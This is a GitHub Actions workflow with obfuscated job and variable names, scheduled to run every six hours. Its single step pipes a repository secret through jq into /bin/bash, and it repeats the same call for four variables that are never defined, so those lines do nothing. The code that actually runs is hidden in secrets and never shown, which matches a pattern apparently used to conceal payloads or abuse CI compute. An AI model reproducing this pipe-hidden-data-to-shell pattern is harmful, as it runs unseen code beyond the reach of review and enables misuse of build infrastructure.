name: chenmeijiao2010

on:
  workflow_dispatch:
  schedule:
    - cron: '27 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chenmeijiao2010
        env:
          nsht6000: ${{ secrets.nsht6000 }}
        run: |
          echo $nsht6000 | jq -r .ka149 | /bin/bash
          echo $esave14379 | jq -r .zvd1291 | /bin/bash
          echo $suu326 | jq -r .g2 | /bin/bash
          echo $zvyyh9 | jq -r .kssr966 | /bin/bash
          echo $izu3 | jq -r .z38 | /bin/bash

